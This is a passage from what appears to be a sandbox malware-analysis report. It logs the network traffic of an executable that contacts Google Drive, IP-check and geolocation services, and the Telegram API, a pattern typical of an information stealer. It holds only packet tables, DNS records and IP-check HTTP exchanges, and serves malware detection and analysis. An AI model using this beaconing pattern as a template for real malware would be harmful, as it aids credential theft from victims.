                                                                                                              Jan 10, 2025 23:39:31.152677059 CET50014443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 23:39:31.156433105 CET5001380192.168.2.8193.122.6.168
                                                                                                              Jan 10, 2025 23:39:31.157150030 CET5001580192.168.2.8193.122.6.168
                                                                                                              Jan 10, 2025 23:39:31.161456108 CET8050013193.122.6.168192.168.2.8
                                                                                                              Jan 10, 2025 23:39:31.161953926 CET8050015193.122.6.168192.168.2.8
                                                                                                              Jan 10, 2025 23:39:31.162029028 CET5001380192.168.2.8193.122.6.168
                                                                                                              Jan 10, 2025 23:39:31.162077904 CET5001580192.168.2.8193.122.6.168
                                                                                                              Jan 10, 2025 23:39:31.162221909 CET5001580192.168.2.8193.122.6.168
                                                                                                              Jan 10, 2025 23:39:31.166940928 CET8050015193.122.6.168192.168.2.8
                                                                                                              Jan 10, 2025 23:39:31.818458080 CET8050015193.122.6.168192.168.2.8
                                                                                                              Jan 10, 2025 23:39:31.819818974 CET50016443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 23:39:31.819861889 CET44350016149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 23:39:31.819925070 CET50016443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 23:39:31.820242882 CET50016443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 23:39:31.820255041 CET44350016149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 23:39:31.862874031 CET5001580192.168.2.8193.122.6.168
                                                                                                              Jan 10, 2025 23:39:32.438263893 CET44350016149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 23:39:32.440032005 CET50016443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 23:39:32.440059900 CET44350016149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 23:39:32.440141916 CET50016443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 23:39:32.440150023 CET44350016149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 23:39:32.720846891 CET44350016149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 23:39:32.720948935 CET44350016149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 23:39:32.721050978 CET50016443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 23:39:32.721518040 CET50016443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 23:39:32.725189924 CET5001580192.168.2.8193.122.6.168
                                                                                                              Jan 10, 2025 23:39:32.726380110 CET5001780192.168.2.8193.122.6.168
                                                                                                              Jan 10, 2025 23:39:32.730149031 CET8050015193.122.6.168192.168.2.8
                                                                                                              Jan 10, 2025 23:39:32.730237007 CET5001580192.168.2.8193.122.6.168
                                                                                                              Jan 10, 2025 23:39:32.731218100 CET8050017193.122.6.168192.168.2.8
                                                                                                              Jan 10, 2025 23:39:32.731300116 CET5001780192.168.2.8193.122.6.168
                                                                                                              Jan 10, 2025 23:39:32.731367111 CET5001780192.168.2.8193.122.6.168
                                                                                                              Jan 10, 2025 23:39:32.736160040 CET8050017193.122.6.168192.168.2.8
                                                                                                              Jan 10, 2025 23:39:33.374069929 CET8050017193.122.6.168192.168.2.8
                                                                                                              Jan 10, 2025 23:39:33.425297976 CET5001780192.168.2.8193.122.6.168
                                                                                                              Jan 10, 2025 23:39:36.317086935 CET50018443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 23:39:36.317131996 CET44350018149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 23:39:36.317203999 CET50018443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 23:39:36.317536116 CET50018443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 23:39:36.317553043 CET44350018149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 23:39:36.936392069 CET44350018149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 23:39:36.938393116 CET50018443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 23:39:36.938409090 CET44350018149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 23:39:36.938463926 CET50018443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 23:39:36.938473940 CET44350018149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 23:39:37.230364084 CET44350018149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 23:39:37.230551004 CET44350018149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 23:39:37.230619907 CET50018443192.168.2.8149.154.167.220
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 10, 2025 23:38:47.142497063 CET6233453192.168.2.81.1.1.1
                                                                                                              Jan 10, 2025 23:38:47.149368048 CET53623341.1.1.1192.168.2.8
                                                                                                              Jan 10, 2025 23:38:48.217786074 CET6059553192.168.2.81.1.1.1
                                                                                                              Jan 10, 2025 23:38:48.224836111 CET53605951.1.1.1192.168.2.8
                                                                                                              Jan 10, 2025 23:38:52.749701977 CET5662153192.168.2.81.1.1.1
                                                                                                              Jan 10, 2025 23:38:52.756575108 CET53566211.1.1.1192.168.2.8
                                                                                                              Jan 10, 2025 23:38:54.223836899 CET5675153192.168.2.81.1.1.1
                                                                                                              Jan 10, 2025 23:38:54.231065035 CET53567511.1.1.1192.168.2.8
                                                                                                              Jan 10, 2025 23:39:00.793085098 CET5920553192.168.2.81.1.1.1
                                                                                                              Jan 10, 2025 23:39:00.799700975 CET53592051.1.1.1192.168.2.8
                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Jan 10, 2025 23:38:47.142497063 CET192.168.2.81.1.1.10x81c2Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:38:48.217786074 CET192.168.2.81.1.1.10x3fd4Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:38:52.749701977 CET192.168.2.81.1.1.10x6ff8Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:38:54.223836899 CET192.168.2.81.1.1.10x1b57Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:39:00.793085098 CET192.168.2.81.1.1.10xb943Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Jan 10, 2025 23:38:47.149368048 CET1.1.1.1192.168.2.80x81c2No error (0)drive.google.com216.58.206.46A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:38:48.224836111 CET1.1.1.1192.168.2.80x3fd4No error (0)drive.usercontent.google.com142.250.181.225A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:38:52.756575108 CET1.1.1.1192.168.2.80x6ff8No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:38:52.756575108 CET1.1.1.1192.168.2.80x6ff8No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:38:52.756575108 CET1.1.1.1192.168.2.80x6ff8No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:38:52.756575108 CET1.1.1.1192.168.2.80x6ff8No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:38:52.756575108 CET1.1.1.1192.168.2.80x6ff8No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:38:52.756575108 CET1.1.1.1192.168.2.80x6ff8No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:38:54.231065035 CET1.1.1.1192.168.2.80x1b57No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:38:54.231065035 CET1.1.1.1192.168.2.80x1b57No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:38:54.231065035 CET1.1.1.1192.168.2.80x1b57No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:38:54.231065035 CET1.1.1.1192.168.2.80x1b57No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:38:54.231065035 CET1.1.1.1192.168.2.80x1b57No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:38:54.231065035 CET1.1.1.1192.168.2.80x1b57No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:38:54.231065035 CET1.1.1.1192.168.2.80x1b57No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:39:00.799700975 CET1.1.1.1192.168.2.80xb943No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                              • drive.google.com
                                                                                                              • drive.usercontent.google.com
                                                                                                              • reallyfreegeoip.org
                                                                                                              • api.telegram.org
                                                                                                              • checkip.dyndns.org
                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.849770193.122.6.168805296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:38:52.766634941 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:38:53.393935919 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:38:53 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                              Jan 10, 2025 23:38:53.398046970 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 10, 2025 23:38:53.583914995 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:38:53 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                              Jan 10, 2025 23:39:00.399024963 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 10, 2025 23:39:00.787436008 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:39:00 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.849831193.122.6.168805296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:39:02.221731901 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 10, 2025 23:39:02.866861105 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:39:02 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.849843193.122.6.168805296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:39:03.833195925 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 10, 2025 23:39:04.478317022 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:39:04 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.849853193.122.6.168805296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:39:05.573251963 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:39:06.201462030 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:39:06 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.849864193.122.6.168805296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:39:07.224889040 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:39:07.852210999 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:39:07 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.849876193.122.6.168805296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:39:08.879765987 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:39:09.514672995 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:39:09 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.849890193.122.6.168805296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:39:10.488059044 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:39:11.114548922 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:39:11 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.849904193.122.6.168805296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:39:12.132570982 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:39:12.762007952 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:39:12 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              8192.168.2.849915193.122.6.168805296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:39:13.768699884 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:39:14.395376921 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:39:14 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              9192.168.2.849929193.122.6.168805296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:39:15.591123104 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:39:16.257596970 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:39:16 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              10192.168.2.849941193.122.6.168805296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:39:17.134722948 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:39:17.773397923 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:39:17 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              11192.168.2.849953193.122.6.168805296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:39:18.734554052 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:39:19.379676104 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:39:19 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              12192.168.2.849965193.122.6.168805296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:39:20.383949995 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
